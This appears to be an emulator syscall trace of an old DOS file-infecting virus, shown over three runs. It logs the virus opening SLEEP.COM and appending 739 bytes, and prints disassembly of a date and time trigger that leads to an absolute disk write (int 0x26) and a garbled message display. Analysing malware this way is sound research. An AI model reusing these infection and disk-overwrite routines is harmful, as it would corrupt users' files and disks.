2018-12-25T12:55:16.868864284Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:16.869926527Z 78 PC: 12afb | Find first file
2018-12-25T12:55:16.876224061Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:16.88227187Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:16.888491223Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:16.889654895Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.892009925Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:17.239268569Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:17.24135297Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.248037466Z 62 PC: 12aef | Close file
2018-12-25T12:55:17.256891142Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.259529733Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.266063587Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.272767463Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.274795822Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.278000169Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.292091766Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.294049807Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.300727799Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.308945414Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.312903722Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.319248837Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.32531099Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.327169973Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.32968664Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.33726503Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.33909646Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.345696574Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.353627093Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.356781488Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.363214956Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.369366204Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.371247227Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.373748131Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.381534762Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.383205097Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.389474934Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.397237467Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.400010261Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.406814094Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.412859804Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.414522724Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.417151934Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.424738137Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.426171253Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.432327843Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.440044367Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.442999567Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.449134063Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.455099678Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.456738131Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.459126562Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.467865811Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.469511946Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.475666438Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.483438859Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.486943567Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.493236084Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.49929144Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.501973133Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.504443266Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.512206041Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.514065911Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.520358274Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.528068162Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.531418742Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.537846963Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.540197184Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.54203907Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.544333526Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:17.546244874Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:17.54856509Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:17.274961846Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:17.276939249Z 78 PC: 12afb | Find first file
2018-12-25T12:55:17.282894628Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:17.29003932Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:17.29686002Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:17.298493677Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.301062869Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:17.320011055Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:17.32141855Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.32779029Z 62 PC: 12aef | Close file
2018-12-25T12:55:17.336244273Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.338721287Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.345160197Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.352538711Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.353982022Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.356814424Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.365371004Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.367282716Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.373589754Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.381578588Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.387146908Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.394553312Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.40077352Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.402493046Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.404919257Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.413019515Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.41494474Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.421287819Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.429516125Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.432810471Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.439294522Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.44600153Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.448135473Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.450829231Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.45869087Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.460414275Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.466653144Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.474209301Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.477049132Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.483121732Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.489016314Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.490625176Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.49398654Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.501548102Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.502989668Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.509174343Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.516722443Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.519238865Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.525333209Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.531308055Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.532649238Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.535155165Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.543441269Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.54507431Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.551779936Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.559953344Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.56273458Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.569329982Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.575485383Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.576999111Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.580333854Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.587982424Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.589170361Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.595786742Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.601229876Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.603719339Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.610290767Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.612549662Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.613700827Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.615649707Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:17.617550767Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:17.620080323Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:17.622644944Z 9 PC: 12c04 | Display string (String= 'S��S��S��S��S��S��S��S��S��S��S���x��'B66a:' �test.4c.om2 �0 .40 �')
2018-12-25T12:55:17.627411243Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:17.364258685Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:17.365895694Z 78 PC: 12afb | Find first file
2018-12-25T12:55:17.371927562Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:17.37822218Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:17.386814759Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:17.388615903Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.391355375Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:17.407626524Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:17.408886001Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.413440329Z 62 PC: 12aef | Close file
2018-12-25T12:55:17.419020118Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.425963735Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.432251926Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.438512896Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.440574901Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.443121036Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.451051462Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.453346965Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.460065169Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.468445273Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.472088905Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.478294394Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.48432016Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.486423276Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.488975798Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.49644905Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.498209822Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.504612431Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.512443229Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.515520797Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.521813992Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.528003593Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.530485196Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.533750486Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.541549525Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.543728077Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.550341902Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.558382166Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.56118697Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.567584379Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.57349755Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.57490514Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.578110091Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.585707494Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.587255469Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.593709356Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.601924055Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.604431187Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.610703396Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.616602629Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.617855036Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.620472455Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.628552541Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.62985494Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.636261976Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.644275638Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.646947565Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.653405544Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.66035521Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.661835684Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.668721724Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.676400302Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.677865305Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.685054608Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.693136034Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.695575006Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.702114525Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.704503714Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.706156531Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.708712292Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:17.71072879Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:17.712721645Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:17.715046513Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:17.719844907Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:17.408885295Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:17.410595078Z 78 PC: 12afb | Find first file
2018-12-25T12:55:17.416377583Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:17.4238703Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:17.43061819Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:17.432344295Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.435045757Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:17.450808614Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:17.452693138Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.459301229Z 62 PC: 12aef | Close file
2018-12-25T12:55:17.468528067Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.471255353Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.479105058Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.485496339Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.487685806Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.490285749Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.498468094Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.502286813Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.509476397Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.515073554Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.518186228Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.525636612Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.532305838Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.534637236Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.537199498Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.546011456Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.556067985Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.562421268Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.570314043Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.573292558Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.579643426Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.585791092Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.589215104Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.591843248Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.599509864Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.600902853Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.607551193Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.615299131Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.618532175Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.624664383Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.630738472Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.63199931Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.634911321Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.642580391Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.644043996Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.651052523Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.658778878Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.66113898Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.668406176Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.674362362Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.67557165Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.678373963Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.68702586Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.688285669Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.695186325Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.703132175Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.705533743Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.712192618Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.718262634Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.71949987Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.722391319Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.730478002Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.732121868Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.737656724Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.746528149Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.749481388Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.756256327Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.758771189Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.760415406Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.763102305Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:17.765254517Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:17.767646925Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
